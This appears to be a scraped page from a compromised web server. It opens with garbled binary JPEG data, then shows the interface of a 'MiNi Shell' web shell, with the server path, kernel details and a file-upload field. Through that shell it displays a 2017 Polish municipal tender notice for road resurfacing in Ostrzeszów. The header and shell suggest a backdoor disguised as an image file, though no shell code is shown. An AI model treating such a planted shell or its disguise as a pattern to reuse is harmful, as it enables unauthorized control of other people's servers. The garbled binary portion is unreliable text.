JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170227/32837-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.ostrzeszow.nowoczesnagmina.pl' target='_blank'>http://www.ostrzeszow.nowoczesnagmina.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 32837 - 2017
              z dnia 2017-02-27 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Ostrzeszów: Remont nawierzchni bitumicznych dróg gminnych<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miasto i Gmina Ostrzeszów, krajowy numer identyfikacyjny
              25085514000000, ul.
              ul. Zamkowa 
              31,
              63-500  
              Ostrzeszów, woj.
              wielkopolskie, państwo
              Polska, tel.
              627 320 600, e-mail
              kom@ostrzeszow.pl, faks
              627 320 601.
              <br />
              Adres strony internetowej (URL): http://www.ostrzeszow.nowoczesnagmina.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://www.ostrzeszow.nowoczesnagmina.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />siedziba zamawiającego: Urząd Miasta i Gminy w Ostrzeszowie ul. Zamkowa 31, 63-500 Ostrzeszów Biuro Obsługi Interesanta (Kancelaria Ogólna) - pokój nr 13 (parter)</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Remont nawierzchni bitumicznych dróg gminnych<br /><b>Numer referencyjny: </b>KOM.271.1.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.Przedmiotem zamówienia jest wykonanie remontu nawierzchni bitumicznych dróg gminnych na terenie miasta i gminy Ostrzeszów. 
2.Zamówienie obejmuje:
I.Remont nawierzchni bitumicznych dróg gminnych (nakładki bitumiczne):1)Rozebranie istniejących krawężników z ławą betonową i wywozem gruzu do 5 km;
2)Ułożenie krawężników drogowych (15x30) na ławie betonowej;
3)Przełożenie istniejących krawężników betonowych 15x30 na ławie betonowej;
4)Przełożenie nawierzchni z kostki betonowej na podsypce piaskowej w celu dostosowania wysokości do nowo osadzonych krawężników;
5)Sfrezowanie nawierzchni bitumicznej na głębokość do 5cm w celu połączenia 
z nawierzchniami sąsiednich ulic;
6)Ścinkę poboczy  na szerokości 1 metra przy średniej grubości 0,10 m z zachowaniem spadku 6-8% oraz wywozem nadmiaru ziemi na odległość do 3 km;
7)Regulacja wysokości studni oraz zaworów;
8)Mechaniczna rozbiórka nawierzchni bitumicznej (z wywozem materiału z rozbiórki na odległość do 3 km) o grubości 5 cm;
9)Rozebranie podbudowy tłuczniowej (z wywozem materiału z rozbiórki na odległość do 3 km) o grubości 20 cm;
10)Roboty ziemne wykonane koparkami podsiębiernymi o poj. łyżki 0,25 m3
 (z wywozem materiału z rozbiórki na odległość do 3 km);
11)Studzienka ściekowa uliczna betonowa z gotowych elementów z osadnikiem bez syfonu;
12)Kanały z rur kanalizacyjnych PCW łączonych na wcisk (rury łącznie z uszczelką), 
o średnicy zewnętrznej 160 mm;
13)Demontaż i ponowny montaż studni ściekowej ulicznej betonowej z gotowych elementów z osadnikiem bez syfonu;
14)Zasypanie wykopów w gruncie kat. I-II z zagęszczeniem mechanicznym, grubość zagęszczanej warstwy 30 cm;
15)Wykonanie koryta w poboczu drogi o śr. głębokość do 28 cm  wraz z zagęszczeniem
 i profilowaniem podłoża  pod warstwy konstrukcyjne nawierzchni;
16)Wykonanie podbudowy w poboczu drogi z kruszywa łamanego stabilizowanego mechanicznie frakcji 0-63 mm grubości 23 cm po zagęszczeniu;
17)Ułożenie naw. bitumicznej (warstwa wiążąca) z mieszanki mineralno-bitumicznej grubości 5 cm standard II;
18)Mechaniczne ścinanie drzew z wywiezieniem pni do 10 km wraz 
z uporządkowaniem terenu oraz karczowanie pni wraz z wywiezieniem karpiny do10 km;
19)Mechaniczne karczowanie pni wraz z wywiezieniem karpiny do10 km;
20)Mechaniczne karczowanie zagajników (krzaków): średnich (od 31-60 % powierzchni)  wraz z wywiezieniem gałęzi do 10 km;
21)Wykonanie podbudowy z kruszywa łamanego  stabilizowanego mechanicznie frakcji 
0-63 mm grubości 10 cm po zagęszczeniu na istniejącej nawierzchni tłuczniowej;
22)Wykonanie podbudowy z kruszywa łamanego  stabilizowanego mechanicznie frakcji 0-31,5 mm grubości 5 cm po zagęszczeniu w celu wyrównania istniejącej nawierzchni tłuczniowej;
23)Rozbiórka nawierzchni z  płyt betonowych drogowych wraz z wywozem na plac zamawiającego (transport do 5 km);
24)Wykonanie koryta drogi o śr. głębokość do 23 cm wraz z zagęszczeniem                        i profilowaniem podłoża  pod warstwy konstrukcyjne nawierzchni oraz wykonanie podbudowy z kruszywa łamanego stabilizowanego mechanicznie frakcji 0-63 mm grubości 23 cm po zagęszczeniu;
25)Wykonanie koryta drogi o śr. głębokość do 33 cm wraz z zagęszczeniem                           i profilowaniem podłoża  pod warstwy konstrukcyjne nawierzchni, podbudowy z gruntobetonu Rm=2,5MPa o grubości 10 cm po zagęszczeniu oraz podbudowy z kruszywa łamanego stabilizowanego mechanicznie frakcji 0-63 mm grubości 23 cm po zagęszczeniu;
26)Mechaniczne oczyszczenie i skropienie emulsją podbudowy z kruszywa łamanego;
27)Ułożenie naw. bitumicznej (warstwa ścieralna) z mieszanki mineralno-bitumicznej grubości 5 cm standard II (125 kg/m2);
28)Dowóz piasku  wraz z wbudowaniem oraz zagęszczeniem o średniej gr. warstwy 10 cm na powierzchni 100 m2;
29)Dowóz gruntu na uzupełnienie poboczy  wraz z wbudowaniem i zagęszczeniem (średnia grubość nawiezionego gruntu na uzupełnienie poboczy 10 cm, szerokość 0,5 metra);
30)Oczyszczenie i skropienie emulsją nawierzchni bitumicznej;
31)Wyrównanie istniejącej nawierzchni bitumicznej mieszanką mineralno bitumiczną grubości 2 cm standard II (50 kg/m2);
32)Ułożenie naw. bitumicznej (warstwa ścieralna) z mieszanki mineralno-bitumicznej grubości 4 cm standard II (100 kg/m2);
33)Wykonanie nawierzchni pobocza drogi z kruszywa łamanego stabilizowanego mechanicznie frakcji 0-31,5 mm. grubości 5 cm po zagęszczeniu (szerokość pobocza 0,5 metra);
34)Malowanie przejść dla pieszych, linii warunkowego zatrzymania farbą akrylową do znakowania jezdni;
35)Rozebranie nawierzchni z kostki betonowej na podsypce piaskowej;
36)Rozebranie nawierzchni z płytek chodnikowych wraz z podbudową i wywozem do 
5 km;
37)Rozebranie nawierzchni bitumicznej chodnika wraz z podbudową  i wywozem do 
5 km;
38)Rozebranie nawierzchni z  trylinki betonowej  wraz z podbudową  i wywozem do 
5 km;
39)Zebranie gruntu na głębokość 20 cm;
40)Wykonanie koryta pod chodnik;
41)Ułożenie obrzeży betonowych o wymiarach 8x25 na betonie B10;
42)Ułożenie krawężników betonowych najazdowych 15x22 na ławie betonowej 
z zaokrągloną krawędzią;
43)Ułożenie krawężników betonowych skośnych 15x30 na ławie betonowej przy zjazdach;
44)Wykonanie podbudowy  z betonu B10 grubości 10 cm;
45)Ułożenie kostki betonowej  gr. 8 cm typu cegła (czerwona)  na podsypce cementowo - piaskowej 1:4 grubości 5 cm (po zagęszczeniu) z wypełnieniem spoin piaskiem;
46)Ułożenie kostki betonowej  gr. 8 cm typu cegła (szara)  na podsypce cementowo - piaskowej 1:4 grubości 5 cm (po zagęszczeniu) z wypełnieniem spoin piaskiem;
47)Ułożenie kostki betonowej  gr. 8 cm typu cegła (szara) na podsypce cementowo - piaskowej 1:4 grubości 10 cm (po zagęszczeniu) z wypełnieniem spoin piaskiem;
48)Roboty ziemne  wykonane koparkami podsiębiernymi o poj. łyżki 0,25 m3 
z demontażem zdeformowanych rur oraz wybranie warstwy pod podbudowę 
(z wywozem materiału z rozbiórki na odległość do 3 km);
49)Wykonanie nowej podbudowy z tłucznia kamiennego ze skały granitowej frakcji 
31,5-63 mm pod rurę gr. 20 cm po zagęszczeniu;
50)Przepusty pod koroną drogi, kanały z rur PCV łączonych na wcisk o średnicy zewnętrznej  400 mm z zasypaniem i zagęszczeniem;
51)Ścianki czołowe dla przepustów rurowych o średnicy  400 mm;
52)Przepusty pod koroną drogi, kanały z rur PCV łączonych na wcisk o średnicy zewnętrznej  600 mm z zasypaniem i zagęszczeniem;
53)Ścianki czołowe dla przepustów rurowych o średnicy  600 mm;
54)Zasypanie wykopów w gruncie kat. I-II z zagęszczeniem mechanicznym, grubość zagęszczanej warstwy 30 cm;
55)Wykonanie koryta w poboczu drogi o śr. głębokość do 10 cm wraz z zagęszczeniem
 i profilowaniem podłoża  pod warstwy konstrukcyjne nawierzchni;
56)Wykonanie podbudowy w poboczu drogi z kruszywa łamanego  stabilizowanego mechanicznie frakcji 0-63 mm grubości 10 cm po zagęszczeniu;
57)Oczyszczenie jezdni, wykonanie podwójnego powierzchniowego utrwalenia nawierzchni bitumicznej z podwójnym rozsypaniem grysów,
II.Remont nawierzchni bitumicznych dróg gminnych (remonty cząstkowe nawierzchni bitumicznych):
1)Remonty cząstkowe nawierzchni bitumicznej przy użyciu mieszanki mineralno  bitumicznej standard II i mieszanki mineralno bitumicznej standard III. Remont polega na: wycięciu uszkodzonych miejsc poprzez sfrezowanie, oczyszczeniu remontowanej nawierzchni z usunięciem destruktu, skropieniu emulsją bitumiczną, oraz wypełnieniu ubytku mieszanką mineralno - bitumiczną i zagęszczeniu walcem, skropieniu bitumem górnej warstwy i zasypaniu kruszywem;
2)Remonty cząstkowe nawierzchni bitumicznej przy użyciu mieszanki mineralno  bitumicznej standard III, bez sfrezowania uszkodzonych miejsc. Remont polega na: oczyszczeniu z usunięciem destruktu i skropieniu emulsją bitumiczną naprawianego miejsca, rozścieleniu mieszanki w zależności od głębokości uszkodzenia, zagęszczeniu ułożonej mieszanki walcem, skropieniu bitumem górnej warstwy 
i zasypaniu kruszywem;
3)Remont cząstkowy nawierzchni bitumicznych emulsją i grysami polega na oczyszczeniu remontowanej powierzchni, skropieniu emulsją asfaltową i zasypaniu grysem a następnie zagęszczeniu walcem przy głębokości wyboi 1,5 cm,   3,0 cm,   4,0 cm i rakowin;
4)Remont cząstkowy nawierzchni tłuczniowej polega na oczyszczeniu remontowanego miejsca ze skruszonego materiału, a następnie wypełnieniu ubytków tłuczniem lub klińcem, zagęszczeniu i usunięciu nadmiaru kruszywa przy głębokości wyboi do 7 cm;
5)Remont cząstkowy  nawierzchni bitumicznej wraz z podbudową tłuczniową polega na wycięciu uszkodzonych miejsc w nawierzchni bitumicznej, wykorytowaniu (zebraniu istniejącej nawierzchni bitumicznej oraz podbudowy) i wykonaniu podbudowy tłuczniowej (frakcja kamienia 0-63 mm) o grubości 23 cm po zagęszczeniu, skropieniu emulsją bitumiczną podbudowy, rozścieleniu i  zagęszczeniu  mieszanki mineralno  bitumicznej standard II (grubość warstwy po zagęszczeniu 5 cm), skropieniu bitumem górnej warstwy i zasypanie kruszywem;
6)Wycięcie i wykarczowanie korzeni drzew tworzących wyboje w nawierzchni polega na wycięciu nawierzchni i usunięciu korzeni;
7)Odwóz destruktu na wskazane miejsce na odległość do 3 km w ilości 45 ton i na każdy dalszy 1 km;
8)Uszczelnienie połączeń nawierzchni bitumicznej, polegające na oczyszczeniu połączeń nawierzchni i zalaniu ich asfaltem drogowym wraz z zasypaniem kruszywem;
9)Przełożenie kostki betonowej  polegające na rozebraniu zapadniętej nawierzchni 
z kostki betonowej, wykonaniu nowej podbudowy i ponownym ułożeniu zdemontowanej kostki;
10)Wymiana uszkodzonych krawężników betonowych 15x30, polega na rozebraniu uszkodzonych krawężników i ułożeniu nowych na ławie betonowej z oporem  beton klasy C12/15. 
3.Szczegółowy opis i warunki realizacji zamówienia określa dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót budowlanych oraz istotne postanowienia umowy. Podane przez Zamawiającego ilości robót są ilościami szacunkowymi przyjętymi dla potrzeb  przeprowadzenia postępowania o udzielenie zamówienia, w tym dla oceny ofert.  Rzeczywista, ostateczna ilość robót wykonywanych w okresie obowiązywania umowy, będzie uzależniona od faktycznych potrzeb, określonych przez Zamawiającego w trakcie realizacji zamówienia. Zamawiający będzie sukcesywnie zlecał Wykonawcy roboty w miarę potrzeb, wynikających ze stanu technicznego dróg.
4.Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych we wzorze umowy stanowiącym Załącznik nr 3 do SIWZ.
5.Zamawiający na podstawie art. 29 ust 3a ustawy Pzp wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz. U. z 2014 r. poz. 1502, z późn . zm.). W prowadzonym postępowaniu Zamawiający wymaga, aby Wykonawca lub Podwykonawca, przez cały okres realizacji zamówienia zatrudniał na podstawie umowy o pracę osoby wykonujące czynności polegające na wykonywaniu robót budowlanych określonych w opisie przedmiotu zamówienia. Szczegółowy sposób dokumentowania osób, o których mowa w art. 29 ust. 3a ustawy Pzp, uprawnienia zamawiającego w zakresie kontroli spełniania przez wykonawcę wymagań,  o których mowa w art. 29 ust. 3a ustawy Pzp, oraz sankcji z tytułu niespełnienia tych wymagań, rodzaju czynności niezbędnych do realizacji zamówienia, których dotyczą wymagania zatrudnienia na podstawie umowy o pracę przez wykonawcę lub podwykonawcę osób wykonujących czynności w trakcie realizacji zamówienia, zawarte są we wzorze umowy (załącznik nr 3 do SIWZ).<br /><br /><b>II.5) Główny kod CPV: </b>45233142-6<br /><b> Dodatkowe kody CPV:</b>45233220-7<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              820312.00<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa wymagań w zakresie warunku<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa wymagań w zakresie warunku<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni warunek jeżeli wykaże: 
1)że nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  wykonał co najmniej dwie roboty budowlane, z których każda polegała na wykonaniu nawierzchni z mieszanki mineralno-bitumicznej na powierzchni nie mniejszej niż 3000 m2;
2)dysponowanie osobą skierowaną przez Wykonawcę do realizacji zamówienia  posiadającą uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w specjalności drogowej lub uprawnienia budowlane wydane na podstawie uprzednio lub odrębnych obowiązujących przepisów uprawniających do pełnienia samodzielnej funkcji technicznej w budownictwie do kierowania robotami na drogach co najmniej klasy lokalna (L) w rozumieniu przepisów o drogach publicznych.
U W A G A:  ilekroć Zamawiający wymaga określonych uprawień do kierowania robotami budowlanymi rozumie przez to uprawnienia   budowlane, w tym przynależność  wpis na listę członków - do właściwej Izby Samorządu Zawodowego, jeżeli obowiązek przynależności do izby samorządu zawodowego wynika z obowiązujących przepisów.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
